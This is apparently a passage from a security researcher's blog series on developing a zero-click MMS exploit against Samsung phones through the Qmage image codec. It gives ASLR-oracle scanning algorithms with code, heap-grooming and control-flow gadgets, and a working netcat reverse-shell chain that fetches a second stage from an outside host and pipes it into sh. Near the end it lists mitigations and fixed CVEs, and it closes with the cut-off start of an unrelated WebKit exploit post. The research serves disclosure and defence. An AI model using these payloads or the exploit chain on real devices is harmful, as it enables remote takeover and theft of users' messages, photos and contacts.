The oracle's view of the 128 MB address range after CFI shadow

The numerous red regions in the bitmap are not inaccessible PROT_NONE mappings, but rather they are sections of code with the "r" bit off:

74dd777000-74dd9a3000 r--p 00000000 103:09 4238    /system/lib64/libhwui.so
74dd9a3000-74ddf3c000 --xp 0022c000 103:09 4238    /system/lib64/libhwui.so
74ddf3c000-74ddf41000 rw-p 007c5000 103:09 4238    /system/lib64/libhwui.so
74ddf41000-74ddf69000 r--p 007ca000 103:09 4238    /system/lib64/libhwui.so
[...]
74de900000-74de92a000 r--p 00000000 103:09 4575    /system/lib64/libvintf.so
74de92a000-74de978000 --xp 0002a000 103:09 4575    /system/lib64/libvintf.so
74de978000-74de979000 rw-p 00078000 103:09 4575    /system/lib64/libvintf.so
74de979000-74de97e000 r--p 00079000 103:09 4575    /system/lib64/libvintf.so

The nonstandard memory rights are caused by a new Execute Only Memory (XOM) mitigation introduced in Android 10. Unfortunately, similarly to the CFI shadow, the mitigation doesn't interfere with our exploit in any way and instead makes the exploitation considerably easier. That's because every library in memory is now fragmented into three parts:

  • A readable area used by .rodata, .eh_frame and similar segments.
  • A non-readable area for the .text and .plt segments.
  • A readable area for sections such as .data and .bss.

The middle non-readable part creates an observable gap of a fixed size, which can be successfully used to fingerprint libraries in memory. To make things even worse, this is especially easy for libhwui.so, because it is by far the largest shared object loaded in the address space, spanning 7.94 MB split into: 2.17 MB (readable), 5.59 MB (execute-only), 180 kB (readable). In the memory map above, it is easy to spot as the single biggest continuous chunk of red color:

Representation of libhwui.so in the memory visualization above

Thanks to XOM, the question is not if we can find libhwui.so, but how efficiently we can find it. Let's consider our options.

Memory scanning algorithm #1 – basic search over mapped regions

To reiterate our working assumptions, the goal is to quickly and accurately identify the 7.94 MB libhwui.so mapping within ~100 MB of the end of CFI shadow. The first algorithm that I tested was very simple:

  • Check the readability of one page in 2.17 MB intervals, such that we always test a page inside the first readable libhwui.so region of that size.
  • If the page is readable, find the end of the accessible region with binary search: let's call it X.
  • Test if the surrounding memory looks like our library:
    • oracle(X - 2.17 MB, 2.17 MB) == True
    • oracle(X + 5.59 MB - 4 kB, 4 kB) == False
    • oracle(X + 5.59 MB, 180 kB) == True
  • If all conditions are met, we have a candidate for libhwui.so.

For fully reliable output, the algorithm collects all candidates over the 100 MB area, and if there is more than one at the end of the scan, it makes additional queries to check non-readability at random offsets of the suspected .text sections, until a single candidate remains. However, since the heuristics used to find the candidates are already quite strong, we might cut some corners and just return the first candidate we encounter, hoping it's the correct address. This is what I call "light mode", and in my research, I've tested both modes of operation of each algorithm to compare their accuracy and performance against my memory map corpus.
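In light mode, the candidate search might be sketched roughly as follows (same assumed oracle and find_region_end helper; the sizes are the approximate values quoted above, not the exact section sizes):

MB, KB = 1 << 20, 1 << 10
RO, XOM, DATA = int(2.17 * MB), int(5.59 * MB), 180 * KB   # approximate libhwui.so region sizes

def find_libhwui_v1(oracle, start, length=100 * (1 << 20)):
    addr = start
    while addr < start + length:
        if oracle(addr, 0x1000):                             # sample one page per RO-sized interval
            x = find_region_end(oracle, addr, max_size=RO)   # end of the readable prologue
            if (oracle(x - RO, RO)                           # ~2.17 MB readable before the gap
                    and not oracle(x + XOM - 4 * KB, 4 * KB) # last page of the gap unreadable
                    and oracle(x + XOM, DATA)):              # ~180 kB readable after the gap
                return x - RO                                # candidate libhwui.so base address
        addr += RO
    return None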

Let's look at the numbers of our initial algorithm:

Algorithm #1             Light mode            Full mode
Min. oracle queries      14                    256
Max. oracle queries      370                   427
Avg. oracle queries      162.90                370.15
Accuracy                 99.1% (3964/4000)     100% (4000/4000)

For a first idea, that's not a terrible outcome – especially in light mode, the number of queries and the accuracy are somewhat acceptable. The 0.9% error rate is caused by the fact that we don't verify the non-readability of the whole 5.59 MB .text section, and we only know that it's non-readable at the beginning and end. This may lead to false positives if other libraries are laid out in memory so unfavorably that they produce a mapping boundary at the offset we are testing for. The full mode mitigates the problem, but at the cost of more than doubling the average number of needed queries, which doesn't seem worth the extra 0.9% accuracy. It is probably more effective to just add a few more random checks of the .text segment to light mode, which would still retain its heuristic nature, but could reduce the error rate to a negligible percentage.

Now that we have a general idea of what the libhwui.so detection algorithm may look like, let's see if we can make any substantial improvements.

Memory scanning algorithm #2 – forward page sampling

In the previous algorithm, we spent 9 iterations in each binary search to find the end of a region, and we invoked it for each of up to 100 ÷ 2.17 ~= 46 readable pages we could have encountered during the scan. This is very wasteful, because most locations in memory look nothing like libhwui.so, and we can quickly disqualify them as candidates without involving the costly operation. The key is to better utilize the fact that we are looking for a huge 5.59 MB continuous non-readable region, whereas most of the search space is actually readable.

Specifically, we will continue sampling pages in 2.17 MB intervals, but instead of treating every readable page as a valid lead to follow up on, we will only act on a series of [1, 0, 0] oracle results. This is how libhwui.so will manifest itself in the sampling output, since the 2.17 MB readable prologue will generate exactly one "1", and the 5.59 MB gap will produce at least two 0's. The three final conditions verified for each candidate in algorithm #1 remain the same here. Of course, the light mode of this improved method is still prone to false positives, but the error rate should be lower because we're verifying two additional offsets in the non-readable range. Furthermore, the algorithm should be more effective, since we're performing the same amount of sampling but much fewer binary searches. Let's see if this is reflected in the numbers of my memory maps data set:

Algorithm #2             Light mode              Full mode
Min. oracle queries      16                      71
Max. oracle queries      120                     143
Avg. oracle queries      44.90                   92.25
Accuracy                 99.925% (3997/4000)     100% (4000/4000)

Indeed, both the accuracy of the light mode and the oracle query counts have greatly improved. We can now locate libhwui.so with almost full confidence in an average of ~45 iterations, which is a very satisfying result. Combined with the avg. 56.45 queries needed to leak the end of CFI shadow and linker64 base address, it adds up to ~100 queries statistically needed to execute the attack, which is well within the bounds of my initial objective (<480 queries total).

The algorithm in this shape was used in the recording of the Galaxy Note 10+ exploit demo video in April 2020, with a minor difference of using 2 MB sampling intervals instead of 2.17 MB. Since then, I have come up with some further optimizations that I will discuss in the section below.

Memory scanning algorithm #3 – the Boyer-Moore optimization

If we think about it, our algorithm currently spends most of the time performing a kind of string searching of the [1, 0, 0] pattern over a sampled view of the address space. In the process, we linearly obtain the values of all consecutive samples until a match is found. But perhaps we could borrow some ideas from classic string searching algorithms to reduce the number of comparisons, and thus the number of pages needed to be sampled, too?

One idea that I had was to run the matching starting from the "tail" (last value) of the pattern and iterating backwards, instead of starting from the head. This is a concept found in the Boyer-Moore algorithm, and it improves the computational complexity by making it possible to "skip along the text in jumps of multiple characters rather than searching every single character in the text." This is especially true for a pattern of the form N × [1] + M × [0], such as [1, 0, 0]. For instance, if there is a mismatch on the last value of the pattern, we know for sure that there won't be a match at offset 0 (currently tested) or 1, and we can resume the search from offset 2, completely skipping an extra offset in the text.

Let's demonstrate this on an example:

Sampled memory map:       [a row of 14 cells holding the 1/0 oracle results for successive sampling offsets]

Pattern matching process: [the [1, 0, 0] pattern is compared against the map tail-first at successive offsets; each mismatch at the tail lets the search jump several cells ahead, so some cells are never queried]
As we can see, thanks to the multi-offset jumps enabled by early mismatches at the tail of the pattern, 5 out of 14 locations in the sampled memory map were never touched by the algorithm, and their values didn't have to be determined by the ASLR oracle. In this case, it is a 35% reduction of the number of necessary oracle queries, and the effect of the optimization can be further amplified by decreasing the sampling interval to some extent, thus making the searched pattern longer. The fact that most of the search space contains readable regions contributes to its success, as the tail comparisons tend to fail early, leading to large jumps skipping broad ranges of memory.
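A sketch of this tail-first matching over the sampled map could look as follows (sample(i) is assumed to lazily query and cache the oracle result for the i-th sampling offset, as in the previous algorithms):

def find_pattern(sample, num_samples, pattern):
    # rightmost position of each value in the pattern, for the bad-character shift rule
    last = {v: max(i for i, p in enumerate(pattern) if p == v) for v in set(pattern)}
    pos = 0
    while pos + len(pattern) <= num_samples:
        j = len(pattern) - 1
        while j >= 0 and sample(pos + j) == pattern[j]:   # compare from the tail backwards
            j -= 1
        if j < 0:
            return pos                                    # full pattern match at this offset
        pos += max(1, j - last[sample(pos + j)])          # jump ahead on a mismatch
    return None

For the [1, 0, 0] pattern, a mismatch on the tail (a readable sample where a 0 is expected) shifts the search by two offsets at once, exactly as in the example above.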

I implemented the optimization in my exploit and experimented with various configurations, to finally conclude that the most efficient setting was a 1 MB sampling interval and a [1, 1, 0, 0, 0, 0, 0] oracle pattern. It was measured to have the following performance:

Algorithm #3             Light mode           Full mode
Min. oracle queries      19                   38
Max. oracle queries      64                   88
Avg. oracle queries      29.63                58.90
Accuracy                 100% (4000/4000)     100% (4000/4000)

In my opinion, that's a solid result. In comparison to algorithm #2, the maximum number of queries was reduced 120 → 64, the average queries decreased by 34% (44.90 → 29.63), and the light mode accuracy reached 100%, making it virtually indistinguishable from the full mode. I think it's a good time to wrap up the work on the libhwui.so leaking logic, but if you have any further ideas for improvement, I'm all ears!

Putting the ASLR bypass together

We can now combine the CFI shadow, libhwui.so and linker64 disclosure logic and run some final benchmarks on the code. In my testing, the final exploit takes between 45 and 129 oracle queries to calculate the two library base addresses, with an average of 85.91 requests. Assuming that the heap buffer overflow is very (99%+) reliable, and every query is only made once, this is equivalent to around 1 – 2.5 hours of run time. An animation illustrating the end-to-end process of a remote ASLR bypass is shown below:


It's worth noting that the animation depicts the exact same queries that were made in the original exploit demo recorded in April, so it's based on the slightly slower algorithm #2. The usage of the optimized algorithm #3 would further reduce the number of necessary queries for this memory layout from 86 down to 75.
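Under the same assumptions as the previous sketches (and with find_libhwui standing in for whichever of the three scanning algorithms is used), the overall bypass could be driven by something like:

def bypass_aslr(oracle):
    shadow_addr = find_cfi_shadow(oracle)              # some address inside the CFI shadow
    shadow_end = find_region_end(oracle, shadow_addr)  # upper bound of the readable area
    linker64_base = find_linker64(oracle, shadow_end)  # ~100 MB past the shadow
    libhwui_base = find_libhwui(oracle, shadow_end)    # hypothetical scan, e.g. algorithm #3
    return linker64_base, libhwui_base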

Moving on to RCE

As discussed in Part 3, knowing the locations of libhwui.so and linker64 allows us to redirect the Bitmap vtable to any function pointer found in the static memory of these modules, or call any of their functions directly with two controlled arguments, by corrupting the android::Bitmap.mPixelStorage.external structure. The simplest way forward would be to call the __dl_popen routine with a shell command to execute, but that requires us to pass an address of our own ASCII string, which we currently don't know. I have briefly looked for ways to inject controlled data into the static memory of libhwui.so as a side effect of some multimedia decoding, but I failed to identify such a primitive.

Of course, the current capabilities at our disposal are so strong that completing the attack should be a formality. Since we can trigger x(y,z) calls where x, y and z are all controlled 64-bit values, we could find a write-what-where code gadget and use it twice in a row to set up a minimalistic 16-byte reverse shell command in some writable memory region. This could certainly work, but it would require the android::Bitmap overflow to succeed three times in a row (twice for the write-what-where and once for the RCE trigger) without any app restarts in between, which seemed to be a risk to the reliability of the exploit. I had hoped to achieve remote code execution in just a single MMS, but how do we do it without any clue as to the location of our data in memory?

One idea would be to have a pointer to our data passed as the first argument of the hijacked function call, without explicitly knowing or leaking the value of the address. Let's see if this could be applied to the mPixelStorage.external structure with a partial overflow, and how it overlaps with the legitimately used heap structure within the encompassing mPixelStorage union:

    struct {                                  struct {
      /* +0x80 */ void*  address;               /* +0x80 */ void*    address;
      /* +0x88 */ size_t size;                  /* +0x88 */ void*    context;
                                                /* +0x90 */ FreeFunc freeFunc;
    } heap;                                   } external;

Conveniently, heap.address points to the bitmap pixel buffer and it overlaps with external.address, the first parameter passed to external.freeFunc. On the other hand, with the linear overflow we're using, it is impossible to modify external.freeFunc without first destroying the values of external.address and external.context. Does it mean that the whole idea is doomed to fail? Not at all, but it will require slightly more heap grooming than originally expected.

Calling functions with a string argument

Overall, I have discovered two different methods to pass string parameters to arbitrary functions – one during the initial exploit development in April 2020, and the second, admittedly a simpler one, while writing this blog post in July. :) I will briefly discuss both of them below. If you wish to follow along, you can use the reference android::Bitmap corruption Qmage sample shared on my GitHub.

Technique #1 – an uninitialized freeFunc pointer

We already know that we can't reach the external.freeFunc pointer without corrupting the other two fields in the structure. However, let's consider what happens if we still cause the heap → external type confusion by switching android::Bitmap.mPixelStorageType to External, but stop the overflow at that and don't corrupt anything beyond offset 0x70. As expected, external.address will assume the value of heap.address, external.context will be equivalent to heap.size, and external.freeFunc will remain uninitialized, because there is no corresponding field at that offset in the heap structure. Later on, when execution reaches the Bitmap::~Bitmap destructor, it will attempt to call the uninitialized function pointer. At that point, the first argument points to a buffer with our data (great!), but we don't really control the instruction pointer… or do we?

In order to set the uninitialized android::Bitmap.external.freeFunc field to some specific value, we would have to trigger an allocation in the same bucket as the Bitmap (129-160 bytes), fill it with our data, have it freed, have one other chunk in that bin size freed, and then have the Bitmap object allocated shortly after. This is caused by jemalloc's LIFO tcaches, which return the most recently freed region in the given bin size, and the fact that the Bitmap creation involves two 160-byte allocations: one for the (overflown) pixel buffer and the other for the C++ object itself. To reiterate, here's an example of a desired set of heap operations that would allow us to control external.freeFunc:

  1. malloc(160) → X
  2. malloc(160) → Y
  3. /* write controlled data to Y */
  4. free(Y);
  5. free(X);
  6. malloc(160) → X (Bitmap pixel backing buffer)
  7. malloc(160) → Y (Bitmap C++ object)

The Bitmap object is generally allocated very early in the image decoding process, but there is a bit of Qmage-related code that executes right before it: the header parsing code reached through the SkQmgCodec::MakeFromStream → ParseHeader → QuramQmageDecParseHeader chain of calls. We can use the SkCodecFuzzer harness with the -l option to obtain a list of heap-related function calls made during header parsing, on the example of the Qmage test file:

malloc(      1216) = {0x408c0f8b40 .. 0x408c0f9000}
malloc(        48) = {0x408c0fafd0 .. 0x408c0fb000}
malloc(      1176) = {0x408c0fcb68 .. 0x408c0fd000}
malloc(      1176) = {0x408c106b68 .. 0x408c107000}
malloc(        17) = {0x408c108fef .. 0x408c109000} ───┐ (X)
malloc(      1024) = {0x408c10ac00 .. 0x408c10b000} ──┐│ (Y)
malloc(      7160) = {0x408c10c408 .. 0x408c10e000} ─┐││ (Z)
free(0x408c10c408) <─────────────────────────────────┘││
free(0x408c10ac00) <──────────────────────────────────┘│
free(0x408c108fef) <───────────────────────────────────┘
malloc(       792) = {0x408c139ce8 .. 0x408c13a000}
malloc(        48) = {0x408c13bfd0 .. 0x408c13c000}
[+] Detected image characteristics:
[+] Dimensions:      4 x 10
[+] Color type:      4
[...]

In the above listing, call stacks were edited out for brevity, and the trace was adjusted to match the allocation sequence observed on a real Android device. There are a few malloc calls, but most of them outlive the header parsing process, except for the three allocations of size 17, 1024 and 7160, marked (X), (Y) and (Z) in the listing. They are all made during the decompression of the optional color table, and serve the following purposes:

  • Region X (17 bytes) is used to store the raw, zlib-compressed color table read directly from the input Qmage stream.
  • Region Y (1024 bytes) is used to store the inflated color table, which further undergoes some Qmage-specific processing.
  • Region Z (7160 bytes) is a fixed-size inflate_state structure allocated inside inflateInit2_.

Considering that both the length and contents of regions X and Y are user-controlled, they match our requirements just perfectly. If we make them both between 129-160 bytes long, and set up the deflated data to have a specific 64-bit value at offset 0x90, then the pixel buffer will reuse region X, the Bitmap object will reuse region Y, and the freeFunc pointer will inherit the specially crafted value from the color table. This can be confirmed with a simple heap-tracing Frida script attached to the com.samsung.android.messaging process:

[9698] malloc(160) => 0x75aad1e980 ────┐    (deflated color table)
[9698] calloc(1, 152) => 0x75aad1ea20 ─┼─┐  (inflated color table)
[9698] malloc(7160) => 0x75b5557000    │ │
[9698] free(0x75b5557000)             (X)│
[9698] free(0x75aad1ea20)              │ │
[9698] free(0x75aad1e980)              │(Y)
[9698] malloc(792) => 0x75b5683500     │ │
[9698] malloc(48) => 0x7649a96140      │ │
[9698] calloc(160, 1) => 0x75aad1e980 <┘ │  (pixel buffer)
[9698] malloc(160) => 0x75aad1ea20 <─────┘  (android::Bitmap object)
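For reference, a minimal version of such a tracing script (not the author's original; it uses Frida's Python bindings with an embedded JavaScript hook) could look like this:

import frida, sys

JS = """
['malloc', 'calloc', 'free'].forEach(function (name) {
  Interceptor.attach(Module.findExportByName(null, name), {
    onEnter: function (args) {
      this.desc = name === 'free'
          ? 'free(' + args[0] + ')'
          : name + '(' + args[0].toInt32() +
            (name === 'calloc' ? ', ' + args[1].toInt32() : '') + ')';
    },
    onLeave: function (retval) {
      send(this.desc + (name === 'free' ? '' : ' => ' + retval));
    }
  });
});
"""

session = frida.get_usb_device().attach("com.samsung.android.messaging")
script = session.create_script(JS)
script.on("message", lambda msg, data: print(msg.get("payload")))
script.load()
sys.stdin.read()   # keep tracing until interrupted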

Indeed, both regions allocated in the color table handling were then reused for the Bitmap object. If we set the freeFunc pointer to all 0x41's, and configure the first few pixels of the bitmap to contain an ASCII string, we should be able to trigger the following crash via MMS:

Thread 46 "pool-8-thread-1" received signal SIGBUS, Bus error.
[Switching to Thread 22783.23006]
[ Legend: Modified register | Code | Heap | Stack | String ]
──────────────────────────────────────── registers ────
$x0  : 0x000000754e54ba60  →  "Hello, world!"
$x1  : 0xa0
[...]
$pc  : 0x41414141414141
$cpsr: [NEGATIVE zero carry overflow interrupt fast]
$fpsr: 0x10
$fpcr: 0x0
[...]
─────────────────────────────────── code:arm64:ARM ────
[!] Cannot disassemble from $PC
[!] Cannot access memory at address 0x41414141414141
───────────────────────────────────────────────────────
gef➤  bt
#0  0x0041414141414141 in ?? ()
#1  0x0000007644d6df00 in android::Bitmap::~Bitmap() ()
Backtrace stopped: Cannot access memory at address 0x75b61149c8
gef➤

Success! We have managed to hijack the control flow while having the first argument (X0 register) point to a text string of our choice, without having to leak its address. Before using this primitive to execute commands, let's quickly review an alternative method to achieve this outcome.

Technique #2 – libwebp to the rescue

If we look at the full definition of the android::Bitmap class, as presented in Part 3, we'll notice that the address of the pixel buffer is stored not just in the heap.address field at offset 0x80, but also at offset 0x18 as part of the SkPixelRef base class:

  /* +0x18 */ void*   fPixels;

This means that to achieve our goal, we should look for routines which call a function pointer loaded from some offset within the this object, and pass the value at offsets 0x18 or 0x80 of this as its first argument. We could then point the fake vtable at that function, provided that there is a reference to it somewhere in static memory of libhwui.so or linker64.

One example of such a fitting gadget that I have found is the static Execute function used in libwebp, which is compiled into libhwui.so (not once but twice, thanks to the Qmage codec):

static void Execute(WebPWorker* const worker) {
  if (worker->hook != NULL) {
    worker->had_error |= !worker->hook(worker->data1, worker->data2);
  }
}

A static pointer to it is located in the global g_worker_interface structure:

static WebPWorkerInterface g_worker_interface = {
  Init, Reset, Sync, Launch, Execute, End
};

It calls a function pointer with two arguments, both of them loaded from an input WebPWorker structure. Let's compare it side-by-side with the prologue of android::Bitmap:

typedef struct {                              struct android::Bitmap {
  /* +0x00 */ void* impl_;                      /* +0x00 */ void*   vtable;
  /* +0x08 */ WebPWorkerStatus status_;         /* +0x08 */ int32_t fRefCnt;
                                                /* +0x0C */ int     fWidth;
  /* +0x10 */ WebPWorkerHook hook;              /* +0x10 */ int     fHeight;
  /* +0x18 */ void* data1;                      /* +0x18 */ void*   fPixels;
  /* +0x20 */ void* data2;                      /* +0x20 */ size_t  fRowBytes;
} WebPWorker;                                 };

This layout checks all the boxes for successful exploitation: data1 overlaps with fPixels, the hook function pointer is stored before it, and there is still enough room left for the fake vtable pointer and refcount. It would be hard to imagine more convenient circumstances, as we get a reliable, controlled call with a string argument with just a minor Bitmap overflow of 0x18 bytes:

  • vtable → &g_worker_interface.Sync in libhwui.so,
  • fRefCnt → 1,
  • fHeight (full 64-bit value at offset 0x10) → destination $PC value

We can once again test it via MMS against the Messages app:

Thread 45 "pool-9-thread-1" received signal SIGBUS, Bus error.
[Switching to Thread 13453.13651]
[ Legend: Modified register | Code | Heap | Stack | String ]
──────────────────────────────────────── registers ────
$x0  : 0x0000007520edcb20  →  "Hello, world!"
$x1  : 0x10
[...]
$pc  : 0x41414141414141
$cpsr: [negative ZERO CARRY overflow interrupt fast]
$fpsr: 0x10
$fpcr: 0x0
[...]
─────────────────────────────────── code:arm64:ARM ────
[!] Cannot disassemble from $PC
[!] Cannot access memory at address 0x41414141414141
───────────────────────────────────────────────────────
0x0041414141414141 in ?? ()
gef➤  bt
#0  0x0041414141414141 in ?? ()
#1  0x0000007644bb78d4 in Execute ()
#2  0x0000007644d9c670 in SkBitmap::~SkBitmap()
#3  0x0000007647952f80 in doDecode
#4  0x0000007647951c90 in nativeDecodeStream
#5  0x0000000072494ff4 in ?? ()
Backtrace stopped: previous frame inner to this frame (corrupt stack?)
gef➤

This gets us within arm's reach of popping a shell on the remote device. There's just one last detail to take care of…

Adjusting the second argument

As mentioned earlier, the major difference between libc's system() and linker64's __dl_popen() is that the latter expects a pointer to readable memory in the second argument:

FILE* popen(const char* cmd, const char* mode);

Unfortunately, both techniques for setting the first parameter to a string clobber the second one with a small integer, which is never a valid pointer (see the X1 register values in the crash logs above). To solve the problem, we need to use an extra, intermediate gadget that will call another function pointer, pass through the first string argument and initialize the second one to a valid address. The ReadStreaEndError function, which is an (unused) part of the Qmage codec in libhwui.so, is the perfect candidate for the task. It operates on a structure that I have reverse-engineered and called QmageStream:

struct QmageStream {
  /* +0x00 */ void *data;
  /* +0x08 */ size_t offset;
  /* +0x10 */ size_t size;
  /* +0x18 */ int (*ReadStream)(QmageStream *stream, void *dst, size_t size);
};

The function's purpose is to read two bytes from the input stream and check if they're equal to "\xFF\x00" (in C-like pseudo code, with the QMG_CopyData wrapper edited out for clarity):

int ReadStreaEndError(QmageStream *stream) {
  unsigned char bytes[2];
  int result;

  result = stream->ReadStream(stream, bytes, 2);
  if (result >= 0 && (bytes[0] != 0xFF || bytes[1] != 0)) {
    result = -29;
  }

  return result;
}

So a function pointer from offset 0x18 of the input structure is called here, with the first argument set to the beginning of that structure, and the second being an address on the stack. That's exactly what we need, with the only downside being that the gadget limits the length of our shell command to 23 characters: the ReadStream pointer has to live at offset 0x18 of the same structure, so only the first 24 bytes (23 characters plus a NUL terminator) are available for the string:

Thread 24 "pool-5-thread-1" received signal SIGBUS, Bus error.
[Switching to Thread 19535.20843]
[ Legend: Modified register | Code | Heap | Stack | String ]
──────────────────────────────────────── registers ────
$x0  : 0x0000007551ccad20  →  "It's a 23-byte command!"
$x1  : 0x000000755162f984  →  0x97e5e8ab00000000
[...]
$pc  : 0x42424242424242
$cpsr: [negative ZERO CARRY overflow interrupt fast]
$fpsr: 0x10
$fpcr: 0x0
[...]
─────────────────────────────────── code:arm64:ARM ────
[!] Cannot disassemble from $PC
[!] Cannot access memory at address 0x42424242424242
───────────────────────────────────────────────────────
0x0042424242424242 in ?? ()
gef➤  hexdump $x0 L32
0x0000007551ccad20     49 74 27 73 20 61 20 32     It's a 2
0x0000007551ccad28     33 2d 62 79 74 65 20 63     3-byte c
0x0000007551ccad30     6f 6d 6d 61 6e 64 21 00     ommand!.
0x0000007551ccad38     42 42 42 42 42 42 42 42     BBBBBBBB
gef➤  bt
#0  0x0042424242424242 in ?? ()
#1  0x0000007644b6636c in ReadStreaEndError ()
Backtrace stopped: Cannot access memory at address 0x755162f9a8
gef➤

Both arguments are now compatible with the definition of __dl_popen, and if we change "BBBBBBBB" to the address of that function, we'll be able to execute arbitrary (though relatively short) commands!

Popping a (reverse) shell

While 23 characters is not much, it is perfectly sufficient to convert the short command to a full-fledged reverse shell. Android devices ship with toybox, a Unix command line tool set that includes some standard networking utilities, such as netcat. Unfortunately, the Android build of nc doesn't support the -e flag, which is the canonical way to set up a reverse shell, but we can work around that. One easy solution is to connect to a remote host and load a new command without any length restrictions, and pipe it to sh:

nc <host> <port>|sh

It's very short, leaving up to 16 bytes for the combined length of the host and port, which is plenty of space. According to my testing, the direct "nc" symlink was introduced as recently as Android 10, but even when invoking netcat through the full "toybox nc" command on Android 9 and earlier, there are 9 characters left for the host/port, and 6-letter domains are still easily registered today. In my case, let's assume I executed the following line:

nc 12.34.56.78 1338|sh

Then on port 1338 of the remote host, I served the second stage payload:

tail -n 0 -f /data/data/com.samsung.android.messaging/1 | /bin/sh -i 2>&1 | nc 12.34.56.78 1337 1> /data/data/com.samsung.android.messaging/1

This is a cool trick to spawn a reverse shell with nc without the -e option, which I found here. It pipes together tail, sh and nc to achieve the result, and uses a temporary file (in a path accessible to the target process) to store the input commands. The gist of the trick is the -f tail option, used to pass commands to sh as they arrive over the network, providing the interactive feel. Once we send the above payload on port 1338, we should momentarily receive another connection on port 1337 with the full reverse shell:

$ nc -l -p 1337 -v
Listening on [0.0.0.0] (family 0, port 1337)
Connection from <redacted> 8632 received!
/bin/sh: can't find tty fd: No such device or address
/bin/sh: warning: won't have full job control
:/ $

And that's it! As shown in the exploit demo, the attacker now has remote access to the device in the security context of the Samsung Messages app. This effectively means that they can access the SMS/MMS messages, photos, contacts, and a number of other types of information on the phone. Given that the vulnerable Qmage codec is baked so deeply in Samsung Android, the attacker could try to further expand their reach in the system by exploiting the same vulnerability locally, compromising the context of another app and gaining access to its data. One example of a potential attack target is the com.android.systemui process, which is highly privileged by nature and is responsible for handling images supplied by other apps to be displayed in notifications. In a similar vein, some degree of persistence could be established by planting an exploit .qmg file in the file system, and having it connect back to a remote host every time the user opens the Gallery app. Once initial command line access to the target phone is obtained, the possibilities of abusing Qmage bugs locally are virtually endless.

Future work

The journey of developing a zero-click MMS exploit against a modern Samsung phone running Android 10 comes to an end. The fundamental reason why the attack was possible was the custom, exceedingly fragile image codec built into Android Skia by Samsung. In order to address the immediate problem, I ran two Qmage fuzzing sessions and reported the resulting crashes to the vendor: one in January 2020 (fixed in May as SVE-2020-16747 / CVE-2020-8899), and a subsequent one in May (fixed in July as SVE-2020-17675). I would like to believe that the codec is now in a much better shape, but I encourage other members of the security community to continue testing it, either with the existing SkCodecFuzzer harness or other custom tools.

While Qmage is the primary culprit here, the vulnerabilities created a great opportunity to test the effectiveness of various Android 10 mitigations and design decisions against low-level exploitation in a realistic setting. Throughout the process, I managed to take advantage of weaknesses in various parts of the OS; some of them provided only minor help, while others were absolutely critical to the feasibility of the exploitation:

  • The Samsung Messages app automatically downloads incoming MMS messages and parses attached images without user interaction and before completing communication with the MMSC, which opens up the remote attack surface and enables the creation of a crash-based ASLR oracle.
  • The image parsing code executes in the same process as the client app, and, unlike video codecs, is not sandboxed.
  • The Android ASLR suffers from several flaws:
    • The Zygote design causes a persistent address space layout across subsequent instances of a crashing app, enabling partial ASLR side channel output to be accumulated over time and combined into a complete ASLR bypass.
    • The sizable CFI shadow region makes it possible to blindly locate readable memory in the address space with an ASLR oracle.
    • The relative entropy between library mappings and the shadow area is quite low, especially for linker64.
    • The presence of execute-only mappings makes it easy to recognize specific shared objects with an oracle, even if they are tightly packed in memory.
  • The crash handling logic in ActivityManager allows for infinite restarts of an unstable app, provided that no two crashes occur within 60 seconds of each other (measured with the uptimeMillis clock).
  • The jemalloc heap allocator has generally favorable properties for exploitation: it's deterministic, doesn't have inline metadata, groups chunks by size, and implements tcaches which may help control uninitialized heap memory with a high degree of precision.
  • Android allows apps to spawn native command-line programs through functions like execve, system, __dl_popen etc. The system also includes networking tools such as netcat, which can be trivially used to set up a reverse shell for convenient remote access post-exploitation.

The above list gives a good overview of the areas for improvement, and we are working with both Android and Samsung to address them and introduce new hardening measures in future versions of the OS and the Samsung Messages app. In some areas, work had already been in motion before this project; for example the upcoming Android 11 fully switches from jemalloc to Scudo as its default heap allocator, and XOM is reverted because it breaks PAN. Furthermore, the effort has already led to some changes in ASLR:


All of these mitigations already make an MMS exploit substantially harder to develop, but there is still a lot of work to do. I will strive to push for further fixes in the areas enumerated above, to make sure that similar zero-click attacks against Android devices cannot be replicated in the future.

Conclusion

The blog post series demonstrated that there are still some very attractive and largely unexplored code bases written in memory-unsafe languages and exposed in widely used software today. It strikes me that the Qmage codec has stayed out of the public eye for so long, evading any kind of fuzzing or manual audit. It raises the question of how much other untested code runs on our desktops and mobile devices every day that we know nothing about, and it highlights the importance of transparency from software vendors. It's in the interest of users to be well-informed about the relevant attack surface, and to benefit from the collective work of the security community researching publicly documented code. Otherwise, bad actors are more incentivized to look for little-known, sensitive software components, and exploit them secretly. In that context, security by obscurity doesn't work, especially if obscurity is the primary element of the software security model.

Another takeaway is that successful exploitation of memory corruption issues in zero-click scenarios is still possible, despite significant efforts being made to mitigate such attacks. Admittedly, the existing security measures in Android made the exploitation harder, slower and less reliable; specifically, thanks to address randomization and the crash handling logic, the attack took between 1 and 2.5 hours and many MMS messages, rather than a single message. However, none of them ultimately stopped the exploit, and all it took to bypass ASLR was the forgotten feature of MMS delivery reports coupled with a strong address probing primitive.

Clearly, memory corruption is far from a solved problem, and keeping our systems secure requires continued work on all levels of software design and development. As we've seen, even minor decisions seemingly unrelated to security – whether to allow unlimited restarts of frequently crashing apps – can make the difference between a feasible and thwarted exploit. This is where offensive exercises like this one bring the most value, as they help discern effective mitigations from futile ones, and guide further defensive work towards the areas that matter the most. On that note, I am especially looking forward to some new, fundamental advancements, such as the shift towards fast memory-safe languages like Rust, and widespread use of hardware-assisted mitigations such as Memory Tagging Extension.

JITSploitation III: Subverting Control Flow

Posted by Samuel Groß, Project Zero

This three-part series highlights the technical challenges involved in finding and exploiting JavaScript engine vulnerabilities in modern web browsers and evaluates current exploit mitigation technologies. The exploited vulnerability, CVE-2020-9802, was fixed in iOS 13.5, while two of the mitigation bypasses, CVE-2020-9870 and CVE-2020-9910, were fixed in iOS 13.6.

==========

This post is third in a series about a Safari renderer exploit. Part 1 discussed a JIT compiler vulnerability in JSC and Part 2 showed how it could be turned into a reliable read/write primitive despite various mitigations. The purpose of this post is to provide an overview of the various code execution mitigations present in WebKit on iOS 13 and to discuss different approaches for bypassing them.

The Evolution of iOS JIT Hardenings

In the “old” days of browser exploitation, an attacker with a read/write capability in a renderer process would simply write arbitrary shellcode into the rwx JIT region and call it a day. 

